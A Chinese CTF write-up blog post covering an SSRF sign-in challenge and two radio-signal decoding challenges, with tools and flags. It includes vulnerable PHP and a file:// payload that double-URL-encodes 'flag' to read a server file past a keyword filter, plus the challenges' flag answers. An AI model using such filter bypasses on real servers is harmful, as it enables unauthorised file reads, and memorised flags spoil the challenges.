wp部分转自

1
https://mp.weixin.qq.com/s?__biz=MzU3ODc2NTg1OA==&mid=2247485804&idx=1&sn=15b8b99fc9cdca98d5fa99484b776063&chksm=fd711c21ca0695374a191994b75b563b1a7604b70aa3c0b0251e78721f5a24de8ff85f85284f&mpshare=1&scene=23&srcid=1207vysHlxNfj0iTwS4Fq5Xw&sharer_sharetime=1607348906792&sharer_shareid=8b035134b7fe8a8160582bb9a2551229#rd

华丽丽的爆了零。
仰慕着夏风师傅对Roar2019的精彩wp,自己做BUU也遇到了相同的题,难度不高,然后小瞧了今年的。
只对misc有了解,web大概只有F12和GET/POST的水平,然后签到出不来,签到是个披着misc皮的web。

签到

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
echo "<!-- /?url= -->";
if ($_GET['url']) {
  if (preg_match("/flag/i", $_GET['url'])) {
    die();
  }
  $curl = curl_init();

  curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($curl, CURLOPT_TIMEOUT, 500);
  curl_setopt($curl, CURLOPT_URL, $_GET['url']);

  $res = curl_exec($curl);
  curl_close($curl);
  echo $res;
}
//47.104.232.98:39390/?url=file:///%25%36%36%25%36%63%25%36%31%25%36%37
//flag{c8ff10a5edb8acb9d8ef20f8eeba19a6}

Hi 433MHz

无线电流量分析,一看就不是我能做的题。但是看完wp乍一看也不是很难,只是第一次看见,不会分析罢了。
以下是北极星战队的wp:
汽车钥匙信号〜433Mhz。车钥匙信号的前导码是稳定的数据流,可以向接收者显示出实际正在被接受的数据。使用/inspectrum波形分析工具,symbols设为8个后,做相应调整,打开add sample plot选项

我们要关注的是蓝色的波形,如果波形比较密集就代表1,比较稀疏就代表0

然后就是慢慢的记录0、1二进制,转为ascii码就是flag

1
flag{25c21b0d-6a11-4312-971b-428d01cdc534}

后记:其实上面的是小题大做了。
刚刚看了别人的wp,直接扔进audacity里像数摩斯电码一样数就行,只不过并不是转成字符串,而是短为0长为1的二进制转ascii

FM

抄别人的wp:
题目给的附件是一个iq格式的文件,然后通过题目附件名称给的提示是rate=2MHZ,
87-108MHZ有点东西,于是就找了很久资料,发现有一个工具gqrx-sdr是专门分析FM调频的,先安装这个软件在kali,然后打开软件设置这些参数,写入文件路径,和Bandwidth设置2MHZ,接着在里面的右边mode模式设置WFM(mono),然后就可以听到出题人在读flag,这时只要慢慢听就能听出来flag

1
flag{82c83416-dadc-4947-80df-b84852b8f35d}